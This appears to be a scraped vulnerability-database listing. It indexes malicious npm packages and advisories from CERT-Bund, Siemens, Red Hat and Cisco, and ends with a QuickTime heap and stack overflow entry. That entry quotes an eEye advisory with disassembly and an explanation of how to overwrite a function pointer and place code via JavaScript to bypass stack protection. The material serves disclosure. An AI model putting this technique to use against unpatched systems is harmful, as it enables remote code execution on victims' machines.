mal-2024-8863 Malicious code in conductor-utils (npm) 2024-09-11T23:05:31Z 2024-09-11T23:05:32Z
mal-2024-8869 Malicious code in perf-tools (npm) 2024-09-11T23:05:31Z 2024-09-11T23:05:31Z
mal-2024-8867 Malicious code in node-integration-test (npm) 2024-09-11T23:05:31Z 2024-09-11T23:05:31Z
mal-2024-8864 Malicious code in create-auction-house (npm) 2024-09-11T23:05:31Z 2024-09-11T23:05:31Z
mal-2024-8861 Malicious code in cryptograph-js (npm) 2024-09-10T23:32:26Z 2024-09-10T23:32:27Z
mal-2024-8860 Malicious code in color-print12345 (npm) 2024-09-10T23:32:26Z 2024-09-10T23:32:27Z
mal-2024-8859 Malicious code in beautiful-text (npm) 2024-09-10T23:32:26Z 2024-09-10T23:32:27Z
mal-2024-8858 Malicious code in priv-pack (npm) 2024-09-10T02:29:11Z 2024-09-10T02:29:11Z
mal-2024-8850 Malicious code in azure-iothub-service-client (npm) 2024-09-09T11:07:52Z 2024-09-10T00:49:29Z
mal-2024-8848 Malicious code in balvant-chavda (npm) 2024-09-09T04:23:38Z 2024-09-10T00:49:29Z
mal-2024-8853 Malicious code in roblox-event-tracker (npm) 2024-09-09T19:07:27Z 2024-09-10T00:30:53Z
mal-2024-8852 Malicious code in roblox-badges (npm) 2024-09-09T19:10:16Z 2024-09-10T00:30:53Z
mal-2024-8851 Malicious code in core-roblox-utilities (npm) 2024-09-09T19:07:17Z 2024-09-10T00:30:53Z
mal-2024-8847 Malicious code in ethersscan-api (npm) 2024-09-07T14:05:30Z 2024-09-10T00:30:53Z
mal-2024-8846 Malicious code in eslint-scope-util (npm) 2024-09-07T14:05:30Z 2024-09-10T00:30:53Z
mal-2024-8845 Malicious code in eslint-module-conf (npm) 2024-09-07T14:05:30Z 2024-09-10T00:30:53Z
mal-2024-8821 Malicious code in apigeeclientlib (npm) 2024-09-05T23:46:23Z 2024-09-10T00:30:53Z
mal-2024-8819 Malicious code in 0g-storage-contracts (npm) 2024-09-05T17:25:55Z 2024-09-10T00:30:53Z
mal-2024-3831 Malicious code in vrt_hitlijst_generic_voting (npm) 2024-06-25T13:19:24Z 2024-09-10T00:30:53Z
mal-2024-8856 Malicious code in roblox-tracer (npm) 2024-09-10T00:01:10Z 2024-09-10T00:01:11Z
mal-2024-8857 Malicious code in ultimiort (npm) 2024-09-09T22:31:53Z 2024-09-09T22:31:53Z
mal-2024-8855 Malicious code in gapuler (npm) 2024-09-09T22:31:53Z 2024-09-09T22:31:53Z
mal-2024-8854 Malicious code in evolution-ds (npm) 2024-09-09T22:22:42Z 2024-09-09T22:22:43Z
mal-2024-8849 Malicious code in video.min (npm) 2024-09-09T05:56:27Z 2024-09-09T14:06:36Z
mal-2024-8840 Malicious code in @rev-mfe-temporary/notifications (npm) 2024-09-08T17:28:16Z 2024-09-08T17:28:16Z
mal-2024-8839 Malicious code in @pd-mfe/framework-request-context (npm) 2024-09-08T17:25:46Z 2024-09-08T17:25:46Z
mal-2024-8841 Malicious code in @sky-team/create-project-modal (npm) 2024-09-08T17:17:11Z 2024-09-08T17:17:11Z
mal-2024-8838 Malicious code in @zarafront/lib-zds (npm) 2024-09-08T17:03:36Z 2024-09-08T17:03:36Z
mal-2024-8837 Malicious code in @warnermediacode/wme-theme-gelatam (npm) 2024-09-08T16:45:46Z 2024-09-08T16:45:46Z
mal-2024-8836 Malicious code in @warnermediacode/wme-gep-modules-bundle (npm) 2024-09-08T16:44:25Z 2024-09-08T16:44:25Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
wid-sec-w-2023-0437 GNU Emacs: Mehrere Schwachstellen ermöglichen Codeausführung 2023-02-20T23:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2022-2181 GNU Emacs: Schwachstelle ermöglicht Codeausführung 2022-11-27T23:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2184 Wireshark: Mehrere Schwachstellen 2020-12-09T23:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2183 Red Hat Enterprise Linux: Schwachstelle ermöglicht Darstellen falscher Informationen 2024-09-18T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2182 Grafana: Schwachstelle ermöglicht Offenlegung von Informationen 2024-09-18T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2181 Oracle Fusion Middleware: Mehrere Schwachstellen 2020-07-14T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2180 Oracle Fusion Middleware: Mehrere Schwachstellen 2022-04-19T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2178 Drupal: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 2024-09-18T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2176 xwiki: Mehrere Schwachstellen 2024-09-18T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2051 ClamAV: Mehrere Schwachstellen ermöglichen Denial of Service und Dateimanipulation 2024-09-04T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2035 Red Hat OpenShift: Mehrere Schwachstellen ermöglichen Manipulation von Dateien und Denial of Service 2024-09-03T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2033 Red Hat Enterprise Linux (CPython): Schwachstelle ermöglicht Manipulation von Dateien 2024-09-02T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1951 expat: Mehrere Schwachstellen ermöglichen Denial of Service 2024-08-29T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1914 Python: Schwachstelle ermöglicht Denial of Service 2024-08-22T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1913 Red Hat OpenShift Container Platform: Mehrere Schwachstellen 2024-08-22T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1828 Intel Prozessor: Mehrere Schwachstellen 2024-08-13T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1783 Mozilla Firefox, Firefox ESR und Thunderbird: Mehrere Schwachstellen 2024-08-06T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1760 ffmpeg: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 2024-08-05T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1756 Red Hat Enterprise Linux (python-setuptools): Schwachstelle ermöglicht Codeausführung 2024-08-04T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1722 Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 2024-07-29T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1661 Linux Kernel: Schwachstelle ermöglicht nicht spezifizierten Angriff 2024-07-17T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1646 Linux Kernel: Mehrere Schwachstellen ermöglichen Manipulation von Dateien 2024-07-16T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1625 Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 2024-07-16T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1562 Red Hat Enterprise Linux: Schwachstelle ermöglicht Offenlegung von Informationen 2024-07-09T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1504 Apache HTTP Server: Mehrere Schwachstellen 2024-07-01T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1474 Red Hat OpenShift Container Platform: Mehrere Schwachstellen 2024-06-27T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1469 OpenSSL: Schwachstelle ermöglicht Denial of Service und Offenlegung von Informationen 2024-06-26T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1418 Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 2024-06-19T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1322 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifische Angriffe 2024-06-09T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1287 Golang Go: Mehrere Schwachstellen 2024-06-04T22:00:00.000+00:00 2024-09-18T22:00:00.000+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
ssa-723487 SSA-723487: RADIUS Protocol Susceptible to Forgery Attacks (CVE-2024-3596) - Impact to SCALANCE, RUGGEDCOM and Related Products 2024-07-09T00:00:00Z 2024-07-22T00:00:00Z
ssa-071402 SSA-071402: Multiple Vulnerabilities in SICAM Products 2024-07-22T00:00:00Z 2024-07-22T00:00:00Z
ssa-998949 SSA-998949: Hard-coded Default Encryption Key in Mendix Encryption Module V10.0.0 and V10.0.1 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-928781 SSA-928781: Multiple Vulnerabilities in SINEMA Remote Connect Server before V3.2 HF1 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-868282 SSA-868282: Multiple Vulnerabilities in SINEMA Remote Connect Client before V3.2 HF1 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-825651 SSA-825651: Deserialization Vulnerability in SIMATIC STEP 7 (TIA Portal) before V18 Update 2 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-824889 SSA-824889: XML File Parsing Vulnerabilities in JT Open and PLM XML SDK 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-780073 SSA-780073: Denial of Service Vulnerability in PROFINET Devices via DCE-RPC Packets 2020-02-11T00:00:00Z 2024-07-09T00:00:00Z
ssa-779936 SSA-779936: Catalog-Profile Deserialization Vulnerability in Siemens Engineering Platforms before V19 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-750274 SSA-750274: Impact of CVE-2024-3400 on RUGGEDCOM APE1808 devices configured with Palo Alto Networks Virtual NGFW 2024-04-19T00:00:00Z 2024-07-09T00:00:00Z
ssa-730482 SSA-730482: Denial of Service Vulnerability in SIMATIC WinCC 2024-04-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-712929 SSA-712929: Denial of Service Vulnerability in OpenSSL (CVE-2022-0778) Affecting Industrial Products 2022-06-14T00:00:00Z 2024-07-09T00:00:00Z
ssa-711309 SSA-711309: Denial of Service Vulnerability in the OPC UA Implementations of SIMATIC Products 2023-09-12T00:00:00Z 2024-07-09T00:00:00Z
ssa-593272 SSA-593272: SegmentSmack in Interniche IP-Stack based Industrial Devices 2020-04-14T00:00:00Z 2024-07-09T00:00:00Z
ssa-484086 SSA-484086: Multiple Vulnerabilities in SINEMA Remote Connect Server before V3.1 2022-06-14T00:00:00Z 2024-07-09T00:00:00Z
ssa-473245 SSA-473245: Denial of Service Vulnerability in Profinet Devices 2019-10-08T00:00:00Z 2024-07-09T00:00:00Z
ssa-446448 SSA-446448: Denial of Service Vulnerability in PROFINET Stack Integrated on Interniche Stack 2022-04-12T00:00:00Z 2024-07-09T00:00:00Z
ssa-381581 SSA-381581: Multiple Vulnerabilities in SINEMA Remote Connect Server before V3.2 SP1 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-346262 SSA-346262: Denial of Service Vulnerability in SNMP Interface of Industrial Products 2017-11-23T00:00:00Z 2024-07-09T00:00:00Z
ssa-337522 SSA-337522: Multiple Vulnerabilities in TIM 1531 IRC before V2.4.8 2024-06-11T00:00:00Z 2024-07-09T00:00:00Z
ssa-313039 SSA-313039: Deserialization Vulnerability in STEP 7 Safety before V19 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-265688 SSA-265688: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 TM MFP V1.1 2024-04-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-170375 SSA-170375: Multiple Vulnerabilities in RUGGEDCOM ROS before V5.9 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-160243 SSA-160243: Multiple Vulnerabilities in SINEC NMS before V2.0 2023-10-10T00:00:00Z 2024-07-09T00:00:00Z
ssa-064222 SSA-064222: Multiple File Parsing Vulnerabilities in Simcenter Femap before V2406 2024-07-09T00:00:00Z 2024-07-09T00:00:00Z
ssa-900277 SSA-900277: MODEL File Parsing Vulnerability in Tecnomatix Plant Simulation before V2302.0012 and V2024.0001 2024-06-11T00:00:00Z 2024-06-11T00:00:00Z
ssa-879734 SSA-879734: Multiple Vulnerabilities in SCALANCE XM-400/XR-500 before V6.6.1 2024-06-11T00:00:00Z 2024-06-11T00:00:00Z
ssa-871704 SSA-871704: Multiple Vulnerabilities in SICAM Products 2024-05-14T00:00:00Z 2024-06-11T00:00:00Z
ssa-625862 SSA-625862: Multiple Vulnerabilities in Third-Party Components in SIMATIC CP 1542SP-1 and CP 1543SP-1 before V2.3 2024-06-11T00:00:00Z 2024-06-11T00:00:00Z
ssa-620338 SSA-620338: Buffer Overflow Vulnerability in SICAM AK3 / BC / TM 2024-06-11T00:00:00Z 2024-06-11T00:00:00Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
rhsa-2023_6251 Red Hat Security Advisory: OpenShift Virtualization 4.11.7 Images security and bug fix update 2023-11-01T16:14:42+00:00 2025-03-29T04:25:59+00:00
rhsa-2023_7215 Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.2.12 2023-11-15T00:16:31+00:00 2025-03-29T04:25:57+00:00
rhsa-2023_6298 Red Hat Security Advisory: Release of OpenShift Serverless Client kn 1.30.2 security update 2023-11-03T08:48:21+00:00 2025-03-29T04:25:56+00:00
rhsa-2023_6200 Red Hat Security Advisory: Multicluster Engine for Kubernetes 2.1.9 security updates and bug fixes 2023-10-30T18:15:21+00:00 2025-03-29T04:25:56+00:00
rhsa-2023_6817 Red Hat Security Advisory: OpenShift Virtualization 4.14.0 Images security and bug fix update 2023-11-08T14:03:27+00:00 2025-03-29T04:25:53+00:00
rhsa-2023_6781 Red Hat Security Advisory: openshift-pipelines-client security update 2023-11-08T01:10:46+00:00 2025-03-29T04:25:53+00:00
rhsa-2023_6240 Red Hat Security Advisory: OpenShift Container Platform 4.13 low-latency extras security update 2023-11-01T13:41:55+00:00 2025-03-29T04:25:50+00:00
rhsa-2023_6179 Red Hat Security Advisory: Red Hat Product OCP Tools 4.13 OpenShift Jenkins security update 2023-10-30T13:03:06+00:00 2025-03-29T04:25:47+00:00
rhsa-2023_6828 Red Hat Security Advisory: ACS 4.1 enhancement update 2023-11-08T18:34:59+00:00 2025-03-29T04:25:44+00:00
rhsa-2023_6305 Red Hat Security Advisory: Migration Toolkit for Applications security update 2023-11-06T11:24:51+00:00 2025-03-29T04:25:44+00:00
rhsa-2023_6296 Red Hat Security Advisory: Release of OpenShift Serverless 1.30.2 2023-11-02T19:16:02+00:00 2025-03-29T04:25:44+00:00
rhsa-2023_6243 Red Hat Security Advisory: openshift-gitops-kam security update 2023-11-01T14:08:03+00:00 2025-03-29T04:25:41+00:00
rhsa-2023_6172 Red Hat Security Advisory: Red Hat Product OCP Tools 4.12 Openshift Jenkins security update 2023-10-30T11:24:00+00:00 2025-03-29T04:25:38+00:00
rhsa-2023_6280 Red Hat Security Advisory: Migration Toolkit for Applications security and bug fix update 2023-11-02T10:25:06+00:00 2025-03-29T04:25:35+00:00
rhsa-2023_6235 Red Hat Security Advisory: OpenShift Virtualization 4.13.5 Images security update 2023-11-01T12:04:35+00:00 2025-03-29T04:25:29+00:00
rhsa-2023_6171 Red Hat Security Advisory: Red Hat Product OCP Tools 4.11 Openshift Jenkins security update 2023-10-30T11:10:10+00:00 2025-03-29T04:25:29+00:00
rhsa-2023_6165 Red Hat Security Advisory: skupper-cli and skupper-router security update 2023-10-30T08:22:15+00:00 2025-03-29T04:25:21+00:00
rhsa-2023_6233 Red Hat Security Advisory: Red Hat OpenShift Enterprise security update 2023-11-01T11:34:35+00:00 2025-03-29T04:25:20+00:00
rhsa-2023_6126 Red Hat Security Advisory: OpenShift Container Platform 4.12.41 bug fix and security update 2023-11-01T11:07:20+00:00 2025-03-29T04:25:18+00:00
rhsa-2023_6161 Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.7.14 security and bug fix update 2023-10-30T02:16:18+00:00 2025-03-29T04:25:11+00:00
rhsa-2023_6115 Red Hat Security Advisory: OpenShift API for Data Protection security update 2023-10-25T14:01:58+00:00 2025-03-29T04:25:11+00:00
rhsa-2023_6220 Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.10.1 security update 2023-10-31T18:22:09+00:00 2025-03-29T04:25:10+00:00
rhsa-2023_6125 Red Hat Security Advisory: OpenShift Container Platform 4.12.41 security and extras update 2023-11-01T10:27:35+00:00 2025-03-29T04:25:09+00:00
rhsa-2023_6217 Red Hat Security Advisory: Red Hat OpenShift Enterprise security update 2023-10-31T14:40:40+00:00 2025-03-29T04:25:02+00:00
rhsa-2023_6156 Red Hat Security Advisory: Red Hat OpenShift support for Windows Containers 8.1.0 security update 2023-10-30T00:25:10+00:00 2025-03-29T04:25:02+00:00
rhsa-2023_6085 Red Hat Security Advisory: Red Hat OpenShift distributed tracing security update 2023-10-24T15:32:35+00:00 2025-03-29T04:25:00+00:00
rhsa-2023_6130 Red Hat Security Advisory: OpenShift Container Platform 4.13.19 bug fix and security update 2023-10-30T13:49:24+00:00 2025-03-29T04:24:59+00:00
rhsa-2023_6031 Red Hat Security Advisory: Cryostat security update 2023-10-23T14:24:36+00:00 2025-03-29T04:24:57+00:00
rhsa-2023_6202 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.6.8 security and bug fix updates 2023-10-30T20:13:48+00:00 2025-03-29T04:24:53+00:00
rhsa-2023_6148 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.7.9 security and bug fix updates 2023-10-26T19:18:44+00:00 2025-03-29T04:24:52+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
cisco-sa-nso-ordir-mnm8yqzo Cisco Crosswork Network Services Orchestrator Open Redirect Vulnerability 2024-05-15T16:00:00+00:00 2024-05-15T16:00:00+00:00
cisco-sa-nso-hcc-priv-esc-owbwcs5d Cisco Crosswork Network Services Orchestrator Privilege Escalation Vulnerability 2024-05-15T16:00:00+00:00 2024-05-15T16:00:00+00:00
cisco-sa-cnfd-rwpesc-zaoufyx8 ConfD CLI Privilege Escalation and Arbitrary File Read and Write Vulnerabilities 2024-05-15T16:00:00+00:00 2024-05-15T16:00:00+00:00
cisco-sa-appd-netvisdos-9znbsjtk Cisco AppDynamics Network Visibility Service Denial of Service Vulnerability 2024-05-15T16:00:00+00:00 2024-05-15T16:00:00+00:00
cisco-sa-ipphone-multi-vulns-cxahcvs Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities 2024-05-01T16:00:00+00:00 2024-05-01T16:00:00+00:00
cisco-sa-asaftd-websrvs-dos-x8gnucd2 Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability 2024-04-24T16:00:00+00:00 2024-04-24T16:00:00+00:00
cisco-sa-asaftd-persist-rce-flsnxf4h Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability 2024-04-24T16:00:00+00:00 2024-04-24T16:00:00+00:00
cisco-sa-asaftd-cmd-inj-zjv8wysm Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability 2024-04-24T16:00:00+00:00 2024-04-24T16:00:00+00:00
cisco-sa-snmp-uwbxfqww Cisco IOS and IOS XE Software SNMP Extended Named Access Control List Bypass Vulnerability 2024-04-17T16:00:00+00:00 2024-04-17T16:00:00+00:00
cisco-sa-ios-dos-hq4d3tzg Cisco IOS Software for Catalyst 6000 Series Switches Denial of Service Vulnerability 2024-03-27T16:00:00+00:00 2024-04-04T15:31:55+00:00
cisco-sa-tms-xss-kgw4dx9y Cisco TelePresence Management Suite Cross-Site Scripting Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-sbiz-rv-xss-oqertup Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers Cross-Site Scripting Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ndru-pesc-kz2pqlzh Cisco Nexus Dashboard Privilege Escalation Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ndo-upav-yrqsccsp Cisco Nexus Dashboard Orchestrator Unauthorized Policy Actions Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ndidv-lmxdvaf2 Cisco Nexus Dashboard Information Disclosure Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ndfccsrf-temzefj9 Cisco Nexus Dashboard and Nexus Dashboard Hosted Services Cross-Site Request Forgery Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ndfc-dir-trav-ssn3aydw Cisco Nexus Dashboard Fabric Controller Plug and Play Arbitrary File Read Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ise-ssrf-ftsth5oz Cisco Identity Services Engine Server-Side Request Forgery Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ise-csrf-nfakxrp5 Cisco Identity Services Engine Cross-Site Request Forgery Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-ece-xss-csqxgxfm Cisco Enterprise Chat and Email Cross-Site Scripting Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-cucm-imps-xss-quwkd9yf Cisco Unified Communications Manager IM & Presence Service Cross-Site Scripting Vulnerability 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-cem-csrf-sucmnjfr Cisco Emergency Responder Cross-Site Request Forgery and Directory Traversal Vulnerabilities 2024-04-03T16:00:00+00:00 2024-04-03T16:00:00+00:00
cisco-sa-iosxe-utd-cmd-jbl8kvht Cisco IOS XE Software Unified Threat Defense Command Injection Vulnerability 2024-03-27T16:00:00+00:00 2024-04-02T20:11:04+00:00
cisco-sa-wlc-mdns-dos-4hv6pbgf Cisco IOS XE Software for Wireless LAN Controllers Multicast DNS Denial of Service Vulnerability 2024-03-27T16:00:00+00:00 2024-03-27T16:00:00+00:00
cisco-sa-lisp-3gyxs3qp Cisco IOS and IOS XE Software Locator ID Separation Protocol Denial of Service Vulnerability 2024-03-27T16:00:00+00:00 2024-03-27T16:00:00+00:00
cisco-sa-isis-sgjyouhx Cisco IOS and IOS XE Software Intermediate System-to-Intermediate System Denial of Service Vulnerability 2024-03-27T16:00:00+00:00 2024-03-27T16:00:00+00:00
cisco-sa-iosxe-wlc-privesc-rjsmrmpk Cisco IOS XE Software for Wireless LAN Controllers Privilege Escalation Vulnerability 2024-03-27T16:00:00+00:00 2024-03-27T16:00:00+00:00
cisco-sa-iosxe-priv-esc-seax6nlx Cisco IOS XE Software Privilege Escalation Vulnerability 2024-03-27T16:00:00+00:00 2024-03-27T16:00:00+00:00
cisco-sa-iosxe-ospf-dos-dr9sfrxp Cisco IOS XE Software OSPFv2 Denial of Service Vulnerability 2024-03-27T16:00:00+00:00 2024-03-27T16:00:00+00:00
cisco-sa-ios-xe-sda-edge-dos-qzwuwxwg Cisco IOS XE Software SD-Access Fabric Edge Node Denial of Service Vulnerability 2024-03-27T16:00:00+00:00 2024-03-27T16:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
var-200512-0300 Heap-based buffer overflow in Apple Quicktime before 7.0.4 allows remote attackers to execute arbitrary code via a GIF image file with a crafted Netscape Navigator Application Extension Block that modifies the heap in the Picture Modifier block. Apple's QuickTime is a player for files and streaming media in a variety of different formats. A flaw in QuickTime's handling of Targa (TGA) image format files could allow a remote attacker to execute arbitrary code on a vulnerable system. Apple From QuickTime Version that fixes multiple vulnerabilities in 7.0.4 Has been released.Arbitrary code may be executed by a remote third party, DoS You can be attacked. For more information, see the information provided by the vendor. QuickTime is prone to a remote heap-based overflow vulnerability. This issue presents itself when the application processes a specially crafted GIF image file. A successful attack can result in a remote compromise. Versions prior to QuickTime 7.0.4 are vulnerable. This flaw has proven to allow for reliable control of data on the heap chunk and can be exploited via a web site by using ActiveX controls. The heap can be overwritten in the Picture Modifier block. The block size calculate code such as: .text:66A339CC mov ax, [esi+0Ch] .text:66A339D0 xor ecx, ecx .text:66A339D2 mov [esp+34h+var_28], ecx .text:66A339D6 mov [esp+34h+var_24], ecx .text:66A339DA mov [esp+34h+var_20], ecx .text:66A339DE mov [esp+34h+var_1C], ecx .text:66A339E2 mov word ptr [esp+34h+var_10], cx .text:66A339E7 mov [esp+34h+arg_4], eax .text:66A339EB movsx eax, ax .text:66A339EE mov word ptr [esp+34h+var_10+2], cx .text:66A339F3 mov cx, [esi+8] .text:66A339F7 movsx edx, cx .text:66A339FA sub eax, edx .text:66A339FC movsx edx, word ptr [esi+6] .text:66A33A00 add eax, 3Eh .text:66A33A03 push edi .text:66A33A04 movsx edi, word ptr [esi+0Ah] .text:66A33A08 sar eax, 3 .text:66A33A0B lea ebx, [esi+6] .text:66A33A0E and eax, 0FFFFFFFCh .text:66A33A11 sub edi, edx .text:66A33A13 movsx edx, ax .text:66A33A16 mov [esi+4], ax .text:66A33A1A imul edi, edx The allocate code is : .text:66A33A68 push edi .text:66A33A69 call sub_668B5B30 But when it real process data to this memory, it use real decode data to write this memory but didn\xa1\xaft check this heap size. This is segment of the write code function(sub_66AE0A70): .text:66AE0B18 movsx edx, word ptr [edi+12h] ; default .text:66AE0B1C imul edx, [edi+0Ch] .text:66AE0B20 mov ecx, [edi+4] .text:66AE0B23 inc word ptr [edi+16h] .text:66AE0B27 mov eax, [esp+arg_0] .text:66AE0B2B add edx, ecx .text:66AE0B2D mov [eax], edx .text:66AE0B2F mov eax, [ebp+10h] .text:66AE0B32 test eax, eax .text:66AE0B34 jz short loc_66AE0B62 .text:66AE0B36 mov ax, [ebp+1Ch] .text:66AE0B3A mov edx, [ebp+0Ch] .text:66AE0B3D movzx cx, ah .text:66AE0B41 mov ch, al .text:66AE0B43 mov [edx], cx .text:66AE0B46 movsx eax, word ptr [edi+12h] .text:66AE0B4A imul eax, [ebp+14h] .text:66AE0B4E add eax, [ebp+10h] .text:66AE0B51 mov cx, [ebp+18h] .text:66AE0B55 mov [ebp+0Ch], eax .text:66AE0B58 mov [ebp+1Ah], cx .text:66AE0B5C mov word ptr [ebp+1Ch], 0 Vendor Status: Apple has released a patch for this vulnerability. An attacker can create a qtif file and send it to the user via email, web page, or qtif file with activex and can directy overflow a function pointer immediately used so it can bypass any stack overflow protection in systems such as xp sp2 and 2003 sp1. Technical Details: When Quicktime processes the data field of a qtif format file, it will copy it to the stack by a byte to a byte , but there is no proper checking, so it will cause a stack overflow in memory. And in this stack, there is a function pointer which will be used immediately when it pre byte copies, so we can use it to bypass any stack overflow protection, such in xp sp2 and 2003 sp1. The origin function point value is 0x44332211. We only need to overflow it to : 0x08332211, ensuring it didn't cause a crash before the 0x44 has been overflowed to 0x08. When it overflows to 0x08332211, we can execute code to 0x08332211, and can first use javascript to get this memory and set my code in it. call [esp+138h+arg_4] <- call a function point in the stack, but this point can be overflowed References QuickTime: QuickTime File Format http://developer.apple.com/documentation/QuickTime/QTFF/index.html Protection: Retina Network Security Scanner has been updated to identify this vulnerability. Vendor Status: Apple has released a patch for this vulnerability. The patch is available via the Updates section of the affected applications. This vulnerability has been assigned the CVE identifier CVE-2005-2340. Credit: Discovery: Fang Xing Greetings: Thanks to all the guys at eEye, and especially Karl Lynn's help. Copyright (c) 1998-2006 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA06-011A Apple QuickTime Vulnerabilities Original release date: January 11, 2006 Last revised: January 11, 2006 Source: US-CERT Systems Affected Apple QuickTime on systems running * Apple Mac OS X * Microsoft Windows XP * Microsoft Windows 2000 Overview Apple has released QuickTime 7.0.4 to correct multiple vulnerabilities. The impacts of these vulnerabilities include execution of arbitrary code and denial of service. I. Description Apple QuickTime 7.0.4 resolves a number of image and media file handling vulnerabilities. (CAN-2005-3713) II. Impact The impacts of these vulnerabilities vary. For information about specific impacts, please see the Vulnerability Notes. Potential consequences include remote execution of arbitrary code or commands and denial of service. III. Solution Upgrade Upgrade to QuickTime 7.0.4. Appendix A. References * US-CERT Vulnerability Note VU#629845 - <http://www.kb.cert.org/vuls/id/629845> * US-CERT Vulnerability Note VU#921193 - <http://www.kb.cert.org/vuls/id/921193> * US-CERT Vulnerability Note VU#115729 - <http://www.kb.cert.org/vuls/id/115729> * US-CERT Vulnerability Note VU#150753 - <http://www.kb.cert.org/vuls/id/150753> * US-CERT Vulnerability Note VU#913449 - <http://www.kb.cert.org/vuls/id/913449> * CVE-2005-2340 - 